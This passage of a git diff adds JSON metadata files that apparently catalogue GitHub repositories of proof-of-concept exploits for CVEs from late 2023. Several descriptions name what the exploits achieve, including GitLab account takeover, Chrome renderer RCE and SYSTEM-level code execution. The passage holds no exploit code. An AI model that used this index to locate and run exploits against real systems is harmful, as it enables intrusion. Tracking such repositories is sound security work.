"Time-based SQLi", + "fork": false, + "created_at": "2024-01-11T05:43:31Z", + "updated_at": "2024-01-11T05:43:31Z", + "pushed_at": "2024-01-11T05:48:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6595.json b/2023/CVE-2023-6595.json new file mode 100644 index 0000000000..67712436b5 --- /dev/null +++ b/2023/CVE-2023-6595.json @@ -0,0 +1,33 @@ +[ + { + "id": 766048857, + "name": "CVE-2023-6595", + "full_name": "sharmashreejaa\/CVE-2023-6595", + "owner": { + "login": "sharmashreejaa", + "id": 161574704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161574704?v=4", + "html_url": "https:\/\/github.com\/sharmashreejaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmashreejaa\/CVE-2023-6595", + "description": null, + "fork": false, + "created_at": "2024-03-02T07:35:29Z", + "updated_at": "2024-03-02T07:35:29Z", + "pushed_at": "2024-03-02T07:35:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6634.json b/2023/CVE-2023-6634.json new file mode 100644 index 0000000000..11c3f89ba6 --- /dev/null +++ b/2023/CVE-2023-6634.json @@ -0,0 +1,35 @@ +[ + { + "id": 782645537, + "name": "CVE-2023-6634", + "full_name": "krn966\/CVE-2023-6634", + "owner": { + "login": "krn966", + "id": 124454175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124454175?v=4", + "html_url": "https:\/\/github.com\/krn966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krn966\/CVE-2023-6634", + "description": "CVE-2023-6634", + "fork": false, + "created_at": "2024-04-05T18:07:08Z", + "updated_at": "2024-10-10T14:22:51Z", + "pushed_at": "2024-04-05T19:37:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6654.json b/2023/CVE-2023-6654.json new file mode 100644 index 0000000000..30353567ea --- /dev/null +++ b/2023/CVE-2023-6654.json @@ -0,0 +1,33 @@ +[ + { + "id": 763947006, + "name": "CVE-2023-6654", + "full_name": "qfmy1024\/CVE-2023-6654", + "owner": { + "login": "qfmy1024", + "id": 76994810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76994810?v=4", + "html_url": "https:\/\/github.com\/qfmy1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qfmy1024\/CVE-2023-6654", + "description": "CVE-2023-6654 EXP", + "fork": false, + "created_at": "2024-02-27T07:50:01Z", + "updated_at": "2024-08-29T16:58:32Z", + "pushed_at": "2024-08-29T16:58:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6661.json b/2023/CVE-2023-6661.json new file mode 100644 index 0000000000..d8c03dfcd6 --- /dev/null +++ b/2023/CVE-2023-6661.json @@ -0,0 +1,33 @@ +[ + { + "id": 735021939, + "name": "CVE-2023-6661", + "full_name": "cli-ish\/CVE-2023-6661", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-6661", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:39:50Z", + "updated_at": "2023-12-23T11:39:51Z", + "pushed_at": "2023-12-23T11:39:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6663.json b/2023/CVE-2023-6663.json new file mode 100644 index 0000000000..760da533db --- /dev/null +++ b/2023/CVE-2023-6663.json @@ -0,0 +1,33 @@ +[ + { + "id": 735021962, + "name": "CVE-2023-6663", + "full_name": "cli-ish\/CVE-2023-6663", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-6663", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:39:57Z", + "updated_at": "2023-12-23T11:39:58Z", + "pushed_at": "2023-12-23T11:39:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6700.json b/2023/CVE-2023-6700.json new file mode 100644 index 0000000000..43f8100bf1 --- /dev/null +++ b/2023/CVE-2023-6700.json @@ -0,0 +1,33 @@ +[ + { + "id": 750276548, + "name": "CVE-2023-6700", + "full_name": "RandomRobbieBF\/CVE-2023-6700", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6700", + "description": "Cookie Information | Free GDPR Consent Solution <= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update", + "fork": false, + "created_at": "2024-01-30T10:32:54Z", + "updated_at": "2024-07-11T16:38:26Z", + "pushed_at": "2024-05-21T13:58:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6702.json b/2023/CVE-2023-6702.json new file mode 100644 index 0000000000..949dad455e --- /dev/null +++ b/2023/CVE-2023-6702.json @@ -0,0 +1,33 @@ +[ + { + "id": 809375652, + "name": "CVE-2023-6702", + "full_name": "kaist-hacking\/CVE-2023-6702", + "owner": { + "login": "kaist-hacking", + "id": 74822163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74822163?v=4", + "html_url": "https:\/\/github.com\/kaist-hacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaist-hacking\/CVE-2023-6702", + "description": "Chrome Renderer 1day RCE via Type Confusion in Async Stack Trace (v8ctf submission)", + "fork": false, + "created_at": "2024-06-02T14:15:27Z", + "updated_at": "2024-11-15T17:22:58Z", + "pushed_at": "2024-06-03T05:03:46Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 73, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6710.json b/2023/CVE-2023-6710.json new file mode 100644 index 0000000000..ad0b1583d3 --- /dev/null +++ b/2023/CVE-2023-6710.json @@ -0,0 +1,64 @@ +[ + { + "id": 735541566, + "name": "Metasploit-Exploits-CVE-2023-6710", + "full_name": "DedSec-47\/Metasploit-Exploits-CVE-2023-6710", + "owner": { + "login": "DedSec-47", + "id": 154718593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154718593?v=4", + "html_url": "https:\/\/github.com\/DedSec-47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DedSec-47\/Metasploit-Exploits-CVE-2023-6710", + "description": "Welcome to the Metasploit Exploits Repository, your go-to resource for a comprehensive collection of cutting-edge exploits designed for penetration testing and ethical hacking. Developed and maintained by Mohamed Mounir Boudjema, this repository is crafted with a deep understanding of the evolving landscape of cybersecurity.", + "fork": false, + "created_at": "2023-12-25T09:40:31Z", + "updated_at": "2024-01-25T21:47:18Z", + "pushed_at": "2023-12-28T12:23:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735543895, + "name": "CVE-2023-6710", + "full_name": "DedSec-47\/CVE-2023-6710", + "owner": { + "login": "DedSec-47", + "id": 154718593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154718593?v=4", + "html_url": "https:\/\/github.com\/DedSec-47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DedSec-47\/CVE-2023-6710", + "description": "Explore the depths of CVE-2023-6710 with our comprehensive Proof of Concept (PoC). This CVE, identified as a potential security vulnerability, has been meticulously examined to demonstrate its impact and provide a hands-on understanding of the associated risks.", + "fork": false, + "created_at": "2023-12-25T09:50:23Z", + "updated_at": "2024-01-25T21:47:19Z", + "pushed_at": "2023-12-28T11:29:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6875.json b/2023/CVE-2023-6875.json new file mode 100644 index 0000000000..988918752f --- /dev/null +++ b/2023/CVE-2023-6875.json @@ -0,0 +1,95 @@ +[ + { + "id": 742857167, + "name": "CVE-2023-6875", + "full_name": "UlyssesSaicha\/CVE-2023-6875", + "owner": { + "login": "UlyssesSaicha", + "id": 70921512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70921512?v=4", + "html_url": "https:\/\/github.com\/UlyssesSaicha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UlyssesSaicha\/CVE-2023-6875", + "description": "CVE-2023-6875 PoC", + "fork": false, + "created_at": "2024-01-13T15:23:17Z", + "updated_at": "2024-11-27T04:39:44Z", + "pushed_at": "2024-01-15T10:58:20Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749076546, + "name": "CVE-2023-6875", + "full_name": "gbrsh\/CVE-2023-6875", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-6875", + "description": "Exploit for CVE-2023-6875 - Unauthorized Account Takeover. ", + "fork": false, + "created_at": "2024-01-27T14:20:51Z", + "updated_at": "2024-08-30T15:05:04Z", + "pushed_at": "2024-01-27T14:23:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753010588, + "name": "CVE-2023-6875", + "full_name": "hatlesswizard\/CVE-2023-6875", + "owner": { + "login": "hatlesswizard", + "id": 123577653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123577653?v=4", + "html_url": "https:\/\/github.com\/hatlesswizard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hatlesswizard\/CVE-2023-6875", + "description": "CVE-2023-6875 exploit written for Xakep.Ru", + "fork": false, + "created_at": "2024-02-05T09:44:35Z", + "updated_at": "2024-02-05T09:45:06Z", + "pushed_at": "2024-02-05T10:14:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6895.json b/2023/CVE-2023-6895.json new file mode 100644 index 0000000000..33d6e87899 --- /dev/null +++ b/2023/CVE-2023-6895.json @@ -0,0 +1,64 @@ +[ + { + "id": 744508630, + "name": "CVE-2023-6895", + "full_name": "FuBoLuSec\/CVE-2023-6895", + "owner": { + "login": "FuBoLuSec", + "id": 156916644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156916644?v=4", + "html_url": "https:\/\/github.com\/FuBoLuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FuBoLuSec\/CVE-2023-6895", + "description": null, + "fork": false, + "created_at": "2024-01-17T12:53:47Z", + "updated_at": "2024-07-07T02:54:16Z", + "pushed_at": "2024-01-21T07:39:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754039197, + "name": "CVE-2023-6895", + "full_name": "nles-crt\/CVE-2023-6895", + "owner": { + "login": "nles-crt", + "id": 61862786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61862786?v=4", + "html_url": "https:\/\/github.com\/nles-crt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nles-crt\/CVE-2023-6895", + "description": null, + "fork": false, + "created_at": "2024-02-07T09:28:10Z", + "updated_at": "2024-02-17T05:16:07Z", + "pushed_at": "2024-02-07T09:32:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6933.json b/2023/CVE-2023-6933.json new file mode 100644 index 0000000000..e714e2b005 --- /dev/null +++ b/2023/CVE-2023-6933.json @@ -0,0 +1,33 @@ +[ + { + "id": 749563403, + "name": "CVE-2023-6933", + "full_name": "w2xim3\/CVE-2023-6933", + "owner": { + "login": "w2xim3", + "id": 91914344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91914344?v=4", + "html_url": "https:\/\/github.com\/w2xim3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w2xim3\/CVE-2023-6933", + "description": "Introduction to CVE-2023-6933 Vulnerability", + "fork": false, + "created_at": "2024-01-28T23:16:53Z", + "updated_at": "2024-01-29T02:26:33Z", + "pushed_at": "2024-01-29T02:34:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6985.json b/2023/CVE-2023-6985.json new file mode 100644 index 0000000000..b65bf1267f --- /dev/null +++ b/2023/CVE-2023-6985.json @@ -0,0 +1,37 @@ +[ + { + "id": 749919472, + "name": "CVE-2023-6985", + "full_name": "RandomRobbieBF\/CVE-2023-6985", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6985", + "description": "10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation Description", + "fork": false, + "created_at": "2024-01-29T16:51:53Z", + "updated_at": "2024-07-11T16:39:17Z", + "pushed_at": "2024-01-29T16:54:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ai-assistant-by-10web", + "cve-2023-6985", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7016.json b/2023/CVE-2023-7016.json new file mode 100644 index 0000000000..f4577b04eb --- /dev/null +++ b/2023/CVE-2023-7016.json @@ -0,0 +1,33 @@ +[ + { + "id": 764138202, + "name": "CVE-2023-7016-POC", + "full_name": "ewilded\/CVE-2023-7016-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2023-7016-POC", + "description": "POC for the flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows that allows an attacker to execute code at a SYSTEM level via local access.", + "fork": false, + "created_at": "2024-02-27T14:48:19Z", + "updated_at": "2024-02-27T14:50:26Z", + "pushed_at": "2024-02-27T14:50:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7028.json b/2023/CVE-2023-7028.json new file mode 100644 index 0000000000..ecbdf73c24 --- /dev/null +++ b/2023/CVE-2023-7028.json @@ -0,0 +1,411 @@ +[ + { + "id": 742381856, + "name": "CVE-2023-7028", + "full_name": "RandomRobbieBF\/CVE-2023-7028", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-7028", + "description": "CVE-2023-7028", + "fork": false, + "created_at": "2024-01-12T10:53:50Z", + "updated_at": "2024-08-09T10:03:25Z", + "pushed_at": "2024-01-12T13:56:38Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-7028", + "gitlab" + ], + "visibility": "public", + "forks": 11, + "watchers": 58, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742443954, + "name": "CVE-2023-7028", + "full_name": "googlei1996\/CVE-2023-7028", + "owner": { + "login": "googlei1996", + "id": 101400530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101400530?v=4", + "html_url": "https:\/\/github.com\/googlei1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/googlei1996\/CVE-2023-7028", + "description": "CVE-2023-7028 poc", + "fork": false, + "created_at": "2024-01-12T13:47:37Z", + "updated_at": "2024-01-12T13:47:37Z", + "pushed_at": "2024-01-12T08:58:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 742480461, + "name": "CVE-2023-7028", + "full_name": "duy-31\/CVE-2023-7028", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-7028", + "description": "An issue has been discovered in GitLab CE\/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.", + "fork": false, + "created_at": "2024-01-12T15:17:59Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-01-12T20:18:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 742554037, + "name": "CVE-2023-7028", + "full_name": "Vozec\/CVE-2023-7028", + "owner": { + "login": "Vozec", + "id": 61807609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4", + "html_url": "https:\/\/github.com\/Vozec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vozec\/CVE-2023-7028", + "description": "This repository presents a proof-of-concept of CVE-2023-7028", + "fork": false, + "created_at": "2024-01-12T18:29:27Z", + "updated_at": "2024-11-13T18:00:51Z", + "pushed_at": "2024-01-13T13:50:20Z", + "stargazers_count": 236, + "watchers_count": 236, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 236, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 744835323, + "name": "CVE-2023-7028", + "full_name": "yoryio\/CVE-2023-7028", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-7028", + "description": "Exploit for CVE-2023-7028 - GitLab CE\/EE", + "fork": false, + "created_at": "2024-01-18T05:17:00Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-03-14T05:30:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-7028", + "gitlab" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744940880, + "name": "gitlab_honeypot", + "full_name": "Esonhugh\/gitlab_honeypot", + "owner": { + "login": "Esonhugh", + "id": 32677240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32677240?v=4", + "html_url": "https:\/\/github.com\/Esonhugh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Esonhugh\/gitlab_honeypot", + "description": "CVE-2023-7028 killer", + "fork": false, + "created_at": "2024-01-18T10:13:18Z", + "updated_at": "2024-01-24T01:41:36Z", + "pushed_at": "2024-01-18T10:31:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747135442, + "name": "CVE-2023-7028-Account-Take-Over-Gitlab", + "full_name": "Shimon03\/CVE-2023-7028-Account-Take-Over-Gitlab", + "owner": { + "login": "Shimon03", + "id": 78235187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78235187?v=4", + "html_url": "https:\/\/github.com\/Shimon03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shimon03\/CVE-2023-7028-Account-Take-Over-Gitlab", + "description": null, + "fork": false, + "created_at": "2024-01-23T10:37:07Z", + "updated_at": "2024-01-23T11:01:04Z", + "pushed_at": "2024-01-23T11:00:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747356855, + "name": "CVE-2023-7028", + "full_name": "thanhlam-attt\/CVE-2023-7028", + "owner": { + "login": "thanhlam-attt", + "id": 79523444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4", + "html_url": "https:\/\/github.com\/thanhlam-attt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-7028", + "description": null, + "fork": false, + "created_at": "2024-01-23T19:11:11Z", + "updated_at": "2024-05-05T02:05:02Z", + "pushed_at": "2024-01-23T19:22:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748113457, + "name": "CVE-2023-7028-Docker", + "full_name": "Trackflaw\/CVE-2023-7028-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-7028-Docker", + "description": "Repository to install CVE-2023-7028 vulnerable Gitlab instance", + "fork": false, + "created_at": "2024-01-25T09:56:00Z", + "updated_at": "2024-01-25T09:56:01Z", + "pushed_at": "2024-01-25T10:18:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748516354, + "name": "CVE-2023-7028", + "full_name": "mochammadrafi\/CVE-2023-7028", + "owner": { + "login": "mochammadrafi", + "id": 73122628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73122628?v=4", + "html_url": "https:\/\/github.com\/mochammadrafi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mochammadrafi\/CVE-2023-7028", + "description": "Python Code for Exploit Automation CVE-2023-7028", + "fork": false, + "created_at": "2024-01-26T06:29:34Z", + "updated_at": "2024-01-26T06:32:54Z", + "pushed_at": "2024-01-26T06:32:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749490677, + "name": "gitlab-exploit", + "full_name": "hackeremmen\/gitlab-exploit", + "owner": { + "login": "hackeremmen", + "id": 97889952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97889952?v=4", + "html_url": "https:\/\/github.com\/hackeremmen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackeremmen\/gitlab-exploit", + "description": "GitLab CVE-2023-7028", + "fork": false, + "created_at": "2024-01-28T18:23:31Z", + "updated_at": "2024-01-29T03:26:47Z", + "pushed_at": "2024-01-28T18:24:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833605581, + "name": "CVE-2023-7028", + "full_name": "soltanali0\/CVE-2023-7028", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2023-7028", + "description": "Implementation and exploitation of CVE-2023-7028 account takeover vulnerability related to GO-TO CVE weekly articles of the 11th week.", + "fork": false, + "created_at": "2024-07-25T11:39:01Z", + "updated_at": "2024-07-25T12:26:04Z", + "pushed_at": "2024-07-25T12:25:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845342869, + "name": "CVE-2023-7028", + "full_name": "gh-ost00\/CVE-2023-7028", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2023-7028", + "description": "CVE-2023-7028 POC && Exploit", + "fork": false, + "created_at": "2024-08-21T04:14:55Z", + "updated_at": "2024-10-08T09:02:23Z", + "pushed_at": "2024-08-21T04:16:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + 